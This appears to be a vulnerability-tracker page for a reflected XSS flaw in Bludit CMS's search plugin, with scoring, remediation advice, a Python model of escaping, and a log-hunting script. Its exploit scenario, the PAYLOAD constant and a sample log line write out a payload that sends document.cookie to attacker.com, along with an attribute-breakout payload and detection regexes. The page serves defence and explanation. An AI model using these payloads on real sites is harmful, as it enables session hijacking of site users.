
Bludit CMS CVE-2026-41456

EUVD-2026-24239 · MEDIUM
Cross-site Scripting (XSS) (CWE-79)
Published 2026-04-21 · VulnCheck · GHSA-xmmc-cmm8-3rvm
5.1 · CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

Base metrics from the vector above:

Attack Vector: Network (AV:N)
Attack Complexity: Low (AC:L)
Attack Requirements: None (AT:N)
Privileges Required: None (PR:N)
User Interaction: Active (UI:A)
Vulnerable System Confidentiality / Integrity / Availability: None / None / None (VC:N/VI:N/VA:N)
Subsequent System Confidentiality / Integrity / Availability: Low / Low / None (SC:L/SI:L/SA:N)

CVSS 4.0 has no Scope metric. Its replacement is the split between the vulnerable system (the Bludit server, which takes no direct impact here) and the subsequent system (the victim's browser session, which takes low confidentiality and integrity impact); that is the usual 4.0 scoring shape for reflected XSS. Threat and environmental metrics are unset (X).

Lifecycle Timeline (7 events)

PoC Detected · Apr 22, 2026 21:20 · vuln.today · public exploit code
Analysis Generated · Apr 21, 2026 19:46 · vuln.today
CVSS changed · Apr 21, 2026 19:22 · NVD · 5.1 (MEDIUM)
EUVD ID Assigned · Apr 21, 2026 19:00 · EUVD · EUVD-2026-24239
Analysis Generated · Apr 21, 2026 19:00 · vuln.today
Patch released · Apr 21, 2026 19:00 · NVD · patch available
CVE Published · Apr 21, 2026 18:03 · NVD · MEDIUM 5.1

Description (CVE.org)

Bludit CMS prior to commit 6732dde contains a reflected cross-site scripting vulnerability in the search plugin that allows unauthenticated attackers to inject arbitrary JavaScript by crafting a malicious search query. Attackers can execute malicious scripts in the browsers of users who visit crafted URLs containing the payload, potentially stealing session cookies or performing actions on behalf of affected users.

Analysis (AI)

Reflected cross-site scripting in Bludit CMS search plugin allows unauthenticated attackers to inject arbitrary JavaScript through malicious search queries. When users visit attacker-crafted URLs containing the XSS payload, malicious scripts execute in their browsers, enabling session cookie theft and actions performed on behalf of victims. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: attacker crafts an XSS payload for the search results page
Delivery: embeds the payload in the search term carried in the URL
Exploit: social-engineers a victim, ideally a logged-in Bludit administrator, into opening the URL
Execution: the search plugin reflects the term into the response without output encoding, and the victim's browser executes the JavaScript
Persist: none; this is reflected, not stored, XSS, so the script runs only for the request that carried it (the attacker re-sends the link to hit again)
Impact: the script runs in the site's origin and can read document.cookie (if the session cookie is not HttpOnly) or issue requests with the victim's session

Vulnerability Assessment (AI)

Exploitation: requires the search plugin to be present and enabled on the target Bludit instance (the plugin ships with Bludit, so assume it is active unless it has been deliberately disabled) and a victim who opens the attacker's URL while holding an authenticated Bludit session; without that session the script still runs but has nothing useful to steal. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment: CVSS 5.1 with AV:N/AC:L/AT:N/PR:N/UI:A reflects network-accessible, low-complexity exploitation with no privileges needed; the only gate is user interaction (the victim opening the link). All vulnerable-system impact metrics are None, so the score comes entirely from the low confidentiality and integrity impact on the subsequent system, the victim's browser session. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario: An attacker crafts a URL containing a search term with embedded JavaScript, e.g., https://target-bludit.com/search.php?query=<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>, and sends it to a Bludit administrator by email or posts it on a forum where administrators may click it. When the victim opens the link, the search plugin reflects the term into the page without escaping it, and the script executes in the victim's browser within the site's origin. Two caveats: the search.php?query= form is this page's illustration, since the advisory names only the search plugin, so confirm the live route and parameter against the deployed plugin; and the raw <script> in the URL is percent-encoded by the browser (or the attacker) and decoded again server-side before reflection. Reading document.cookie only works if the session cookie lacks the HttpOnly flag; if it has it, the script can still issue authenticated same-origin requests (create or edit content, change settings) on the victim's behalf, which is the "actions on behalf of affected users" in the description. …
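To make the reflection and the fix concrete, here is an added Python model of the behaviour described above; it is not Bludit's code (the plugin is PHP) and not from the advisory. The search term is parsed from the URL, written into the page either raw (the pre-fix behaviour) or through html.escape(quote=True), which here stands in for PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8'). The query parameter name and search.php path are taken from the page's illustrative URL and are assumptions, not a confirmed Bludit route. The block also covers the attribute-context variant, where a payload with no angle brackets breaks out of value="…", and ends with the canary check a practitioner can run against a response body after patching.

```python
"""Reflected search-term XSS: vulnerable vs. hardened rendering.

Added illustration, not Bludit's code. It models in Python what the
advisory describes: the search term arrives in the request URL and is
written back into the HTML response. html.escape(s, quote=True) stands in
for PHP's htmlspecialchars($s, ENT_QUOTES, 'UTF-8'). The 'query' parameter
and search.php path come from the page's illustrative URL and are
ASSUMPTIONS, not a confirmed Bludit route.
"""
import re
from html import escape
from urllib.parse import parse_qs, urlencode, urlparse

# Payload as quoted in the exploit scenario above.
PAYLOAD = "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"

# Attribute-context payload: no angle brackets, it breaks out of value="...".
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)" x="'


def build_url(term: str, base: str = "https://target-bludit.com/search.php") -> str:
    """What is actually sent on the wire: the payload is percent-encoded.
    The '+' in the payload must be sent as %2B or it decodes to a space."""
    return base + "?" + urlencode({"query": term})


def search_term_from_url(url: str) -> str:
    """Server side: parse_qs percent-decodes the parameter, so the raw
    '<script>' text is what the plugin then handles."""
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    return params.get("query", [""])[0]


def render_vulnerable(term: str) -> str:
    """Pre-fix behaviour: the term is concatenated straight into the markup,
    both in element content and inside a quoted attribute."""
    return (
        f"<h1>Search results for: {term}</h1>\n"
        f'<input type="text" name="query" value="{term}">'
    )


def render_hardened(term: str) -> str:
    """Fix: encode once, at output time, for the HTML context being written.
    quote=True also encodes both quote characters, which closes the
    attribute-context hole (PHP: ENT_QUOTES)."""
    safe = escape(term, quote=True)
    return (
        f"<h1>Search results for: {safe}</h1>\n"
        f'<input type="text" name="query" value="{safe}">'
    )


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
EVENT_HANDLER_ATTR = re.compile(r'\son[a-z]+\s*=\s*"', re.IGNORECASE)


def contains_live_markup(body: str) -> bool:
    """True if the rendered page contains a script tag or an event-handler
    attribute that a browser would honour."""
    return bool(SCRIPT_TAG.search(body) or EVENT_HANDLER_ATTR.search(body))


def reflects_canary_unencoded(body: str, canary: str = "<zq7-canary>") -> bool:
    """Post-patch check against a real response body: search for the canary
    and see whether it comes back verbatim. A fixed build returns
    '&lt;zq7-canary&gt;' instead."""
    return canary in body


if __name__ == "__main__":
    term = search_term_from_url(build_url(PAYLOAD))
    print("vulnerable page carries live script:", contains_live_markup(render_vulnerable(term)))
    print("hardened page carries live script:  ", contains_live_markup(render_hardened(term)))
    print("attribute breakout, vulnerable:     ", contains_live_markup(render_vulnerable(ATTR_PAYLOAD)))
    print("attribute breakout, hardened:       ", contains_live_markup(render_hardened(ATTR_PAYLOAD)))
```

The attribute case is why a fix that only strips or encodes angle brackets is not enough: the harmful characters depend on where in the HTML the term lands, so the encoder must be chosen for the output context, and in a quoted attribute the quote characters are the ones that matter.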
Remediation: Upgrade Bludit CMS to a build that includes commit 6732dde or later. The advisory does not name a released version, so either deploy the current development branch containing that commit or wait for the next stable release that includes it, and confirm the fix afterwards by submitting a harmless search term containing HTML metacharacters and checking that the response encodes them (a literal < should come back as &lt;). Until the fix is in place, two general controls reduce the blast radius without removing the injection: an HttpOnly session cookie blunts cookie theft, and a Content-Security-Policy that does not allow unsafe-inline blocks the inline script in the quoted payload. … Detailed patch versions, workarounds, and compensating controls in full report.
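Since the timeline above records public exploit code, a defender will also want to look back through access logs for attempts. The following added hunt script is mine, not the page's or the project's; it parses combined-format access log lines, keeps those aimed at the search endpoint, percent-decodes the URL repeatedly (attackers double-encode to slip past naive filters) and flags markup or JavaScript in the decoded term. It assumes the search term travels in the request URL and that the endpoint path contains "search"; the advisory does not give the exact route, so adjust is_search_request() to the deployed plugin. The log lines are constructed for the example, not real traffic.

```python
"""Hunting for reflected-XSS probes against a Bludit search endpoint in
web server access logs (Apache/nginx combined format).

Added example, not from the page or the Bludit project. ASSUMPTIONS: the
search term travels in the request URL (path segment or query string) and
the endpoint path contains "search"; the advisory does not state the route.
"""
import re
from urllib.parse import unquote

# Combined log format; only the fields the hunt needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Markup or JavaScript that has no business in a search term.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|body|object|embed)\b"  # common tag vectors
    r"|\bon[a-z]+\s*="                                        # event-handler attributes
    r"|javascript\s*:"                                         # scheme-based payloads
    r"|document\.cookie",                                      # the page's stated goal
    re.IGNORECASE,
)


def decode_until_stable(value: str, limit: int = 3) -> str:
    """Percent-decode repeatedly to unwrap double encoding. unquote (not
    unquote_plus) is used so a literal '+' in the term survives. Capped so a
    hostile log line cannot make this loop."""
    for _ in range(limit):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_search_request(url: str) -> bool:
    # Assumption: the search plugin's URL contains 'search'.
    return "search" in url.lower()


def scan(lines):
    """Return one finding per log line that targets the search endpoint and
    carries a suspicious decoded URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_search_request(m["url"]):
            continue
        decoded = decode_until_stable(m["url"])
        if SUSPICIOUS.search(decoded):
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "status": int(m["status"]),
                "decoded_url": decoded,
            })
    return findings


# Constructed sample lines (not real traffic). Line 1 carries the page's
# payload, line 2 is a benign search, line 3 is double-encoded, and line 4
# is a non-search request that must not be attributed to this CVE.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Apr/2026:21:20:01 +0000] "GET /search.php?query=%3Cscript%3Efetch%28%27https%3A%2F%2Fattacker.com%2Fsteal%3Fcookie%3D%27%2Bdocument.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 2311',
    '198.51.100.4 - - [22/Apr/2026:21:21:10 +0000] "GET /search/bludit+themes HTTP/1.1" 200 4012',
    '203.0.113.7 - - [22/Apr/2026:21:22:33 +0000] "GET /search/%253Cimg%2520src%253Dx%2520onerror%253Dalert%25281%2529%253E HTTP/1.1" 200 1990',
    '192.0.2.9 - - [22/Apr/2026:21:23:00 +0000] "GET /admin/login?next=%3Cscript%3E HTTP/1.1" 302 0',
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["status"], f["decoded_url"])
```

A 200 on a flagged line only shows the probe was served, not that anyone clicked it; to tell an attacker's own scan from a victim's visit, correlate the source IP and User-Agent with admin-panel requests in the same session window.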



